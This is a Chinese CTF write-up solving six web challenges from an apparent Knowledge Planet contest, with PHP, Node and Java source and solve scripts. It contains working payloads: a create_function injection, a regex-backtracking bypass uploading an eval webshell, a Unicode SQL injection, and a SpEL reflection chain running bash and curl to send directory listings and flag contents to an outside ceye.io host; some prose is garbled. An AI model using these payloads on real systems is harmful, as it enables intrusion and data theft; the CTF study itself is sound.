前言
这个是知识星球里面的一个比赛,一开始的时候事情多,没及时做,最近刷ph牛的文章看到这个比赛,找来复现一下
function
题目
function这题是一个php代码审计题,题目很短
1 2 3 4 5 6 7 8 9
<?php $action = $_GET['action' ] ?? '' ; $arg = $_GET['arg' ] ?? '' ; if (preg_match('/^[a-z0-9_]*$/isD' , $action)) { show_source(__FILE__ ); } else { $action('' , $arg); }
可以看到,题目想要我们输入两个参数绕过正则,然后就可以执行任意命令了
题解
寻找可利用字符
我们先审计源码,可以看到如果传过来action和arg那就分别赋值,然后对action进行正则表达式过滤
1 2 3 4
/^[a-z0-9 _]*$/isD /i 忽略大小写 /s 匹配任何不可见字符 /D 如果正则表达式用$限制结尾字符,则不允许结尾有换行
所以我们现在就要找一个开头不是字母数字和下划线的值,同时还要可以正常地执行函数
1 2 3 4 5 6 7 8 9 10 11
import requestsfor i in range(0 ,256 ):s= hex(i)[2 :] if len(s)<2 :s = '%0' +s else :s = '%' +s url = 'http://xiaorouji.cn:8087/?action=' +s+'var_dump&arg=find' r = requests.get(url=url).content if 'find' in r:print s
跑出来%5c可以成功绕过,原因p神在小密圈说了
1 2
php里默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。 如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。
寻找getshell函数
接下来的利用我们就要用到create_function函数了
1
create_function ( string $args , string $code ) : string
这个函数由两个参数组成,第一个是函数名,第二个是函数内的代码。官方例子如下
1 2 3 4 5
$newfunc = create_function('$a,$b' , 'return "ln($a) + ln($b) = " . log($a * $b);' ); 实际上也就是 function test ($a,$b) return "ln($a) + ln($b) = " .log($a*$b); }
也可以简单理解成
1 2 3
create_function($_GET['args' ],$_GET['code' ]); $a = 'function __lambda_func(' .$_GET['args' ].'){' .$_GET['code' ].'}\0' ; eval ($a);
顺便看一下create_function的源码也可以看到第一个参数是用(闭合的,第二个是用{闭合的
getflag
剩下的就是闭合以及利用了,尝试一下能不能得到phpinfo
parewaf
这个题目依旧很短,考的是php的正则特性
题目
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
<?php function is_php ($data) return preg_match('/<\?.*[(`;?>].*/is' , $data); } if (empty ($_FILES)) { die (show_source(__FILE__ )); } $user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR' ]); $data = file_get_contents($_FILES['file' ]['tmp_name' ]); if (is_php($data)) { echo "bad request" ; } else { @mkdir($user_dir, 0755 ); $path = $user_dir . '/' . random_int(0 , 10 ) . '.php' ; move_uploaded_file($_FILES['file' ]['tmp_name' ], $path); header("Location: $path" , true , 303 ); }
可以看到,这是一个上传文件的代码bad request,否则就新建一个路径为data/md5($_SERVER['REMOTE_ADDR']),然后将文件命名为randon_int(0,10).php存储在新建的文件夹里面,最后将存储路径在http头里面返回过来
题解
分析正则
首先我们先看一下他的正则表达式
的匹配过程<?,接下来的.*将所有都匹配了,然后还需要匹配就要回溯回去前面,因此一直回溯到前面的>完成符号匹配,然后从该点开始向后进行匹配,完成最后的.*匹配
payload
既然已经知道要怎么绕过漏洞点了,接下来就是写payload了
1 2 3 4 5 6 7 8 9
import requestsfrom io import BytesIOfile = { 'file' : BytesIO('<?php eval($_POST["cmd"]);//' + 'a' *1000010 )} res = requests.post('http://xiaorouji.cn:8088/' ,files=file,allow_redirects=False ) print res.headers['Location' ]
拿到了shell文件目录以后就是利用了
phpmagic
这个题目让人感觉略为懵逼,但是找到源码就做起来舒服了
题目
源码如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
if (isset ($_GET['read-source' ])) { exit (show_source(__FILE__ )); } define('DATA_DIR' , dirname(__FILE__ ) . '/data/' . md5($_SERVER['REMOTE_ADDR' ])); if (!is_dir(DATA_DIR)) { mkdir(DATA_DIR, 0755 , true ); } chdir(DATA_DIR); $domain = isset ($_POST['domain' ]) ? $_POST['domain' ] : '' ; $log_name = isset ($_POST['log' ]) ? $_POST['log' ] : date('-Y-m-d' ); if (!empty ($_POST) && $domain): $command = sprintf("dig -t A -q %s" , escapeshellarg($domain)); $output = shell_exec($command); $output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES); $log_name = $_SERVER['SERVER_NAME' ] . $log_name; if (!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php' , 'php3' , 'php4' , 'php5' , 'phtml' , 'pht' ], true )) { file_put_contents($log_name, $output); } echo $output; endif ;
题解
审计源码可以看到,文件名和文件内容我们都是可以知道的,但是文件内容会经过htmlspecialchars,所以想直接传个小马是8可能的,但是php有一个特性,只要能进行文件传输的地方,基本是都是能进行协议流的传输的,我们先本地尝试一波$_SERVER['SERVER_NAME'],同时后缀几乎全部过滤了,还有就是文件内容也不是完全可控的$_SERVER['SERVER_NAME'],我们可以通过修改Host的值达到控制的目的黑魔法 ,所以我们只要在文件名后面加个\.就可以绕过限制了ltltgtgtDiG9959deb8u15DebianltltgtgttAq刚好40位,4的倍数,所以直接加文件内容就行啦
phplimit
这道题目很短,满足了正则就能执行任意命令了
题目
1 2 3 4 5 6
<?php if (';' === preg_replace('/[^\W]+\((?R)?\)/' , '' , $_GET['code' ])) { eval ($_GET['code' ]); } else { show_source(__FILE__ ); }
题解
从正则表达式可以看到它会匹配字母和括号,接下来找一找能绕过的方法session_id,用来设置或者获取当前会话的id,对应PHPSESSID的值session_start,用来创建新的会话或者重用现有会话session_id(session_start()),但是PHPSESSID只允许字母数字和下划线,所以要将字符换下编码
1
readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));
巨强
nodechr
一进去就是一大堆代码……
题目
首先审计源码可以看到题目将flag放进去数据库,然后让用户登录进去,先贴一波关键源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
function safeKeyword (keyword ) if (isString(keyword) && !keyword.match(/(union|select|;|\-\-)/i s)) { return keyword } return undefined } async function login (ctx, next ) if (ctx.method == 'POST' ) { let username = safeKeyword(ctx.request.body['username' ]) let password = safeKeyword(ctx.request.body['password' ]) let jump = ctx.router.url('login' ) if (username && password) { let user = await ctx.db.get(`SELECT * FROM "users" WHERE "username" = '${username.toUpperCase()} ' AND "password" = '${password.toUpperCase()} '` ) if (user) { ctx.session.user = user jump = ctx.router.url('admin' ) } } ctx.status = 303 ctx.redirect(jump) } else { await ctx.render('index' ) } }
可以看到他将union和select那些过滤了,所以想直接读flag有点难,但是我们可以看到有个toUpperCase函数,看下ph牛的这篇文章 ,因此我们可以利用这些字符写payload
1 2 3 4 5 6 7 8 9
import requests,base64url = "http://xiaorouji.cn:8085/login" data = { "username" : "admin" , "password" : "0' unıon ſelect 1,flag,3 from flags where '1'='1" } res = requests.post(url,data=data).content print res
Javacon
这题我们首先可以拿到一个jar包,然后用idea反编译出来可以看到一堆的java代码,肉鸡枯了…….admin/admin是可以登录进网站的MainController文件,这里只放重点函数FORBIDDEN,否则就继续下面的语句,在SmallEvaluationContext中进行SPEL解析,又因为有黑名单java.+lang,Runtime,exec.*\(,所以最后的利用字符串拼接和反射构造pop链
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
package com.company;import javax.crypto.spec.IvParameterSpec;import java.util.Base64;import javax.crypto.Cipher;import javax.crypto.spec.SecretKeySpec;import org.slf4j.LoggerFactory;class Encryptor static org.slf4j.Logger logger = LoggerFactory.getLogger(Encryptor.class); public static String encrypt (String key, String initVector, String value) try { IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8" )); SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8" ),"AES" ); Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING" ); cipher.init(1 , skeySpec, iv); byte [] encrypted = cipher.doFinal(value.getBytes()); return Base64.getUrlEncoder().encodeToString(encrypted); }catch (Exception e){ logger.warn(e.getMessage()); } return null ; } } public class Main public static void main (String[] args) System.out.println(Encryptor.encrypt("c0dehack1nghere1" , "0123456789abcdef" , "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.la'+'ng.Ru'+'ntime')), new String[]{'/bin/bash','-c','curl http://abcdef.ceye.io/`cd / && ls|base64|tr \"\n\" \"-\"`'})}" )); System.out.println(Encryptor.encrypt("c0dehack1nghere1" , "0123456789abcdef" , "#{T(String).getClass().forName('java.la'+'ng.Ru'+'ntime').getMethod('ex'+'ec',T(String[])).invoke(T(String).getClass().forName('java.l'+'ang.Ru'+'ntime').getMethod('getRu'+'ntime').invoke(T(String).getClass().forName('java.l'+'ang.Ru'+'ntime')),new String[]{'/bin/bash','-c','curl http://abcdef.ceye.io/`cat flag_j4v4_chun|base64`'})}" )); } }
读目录
评论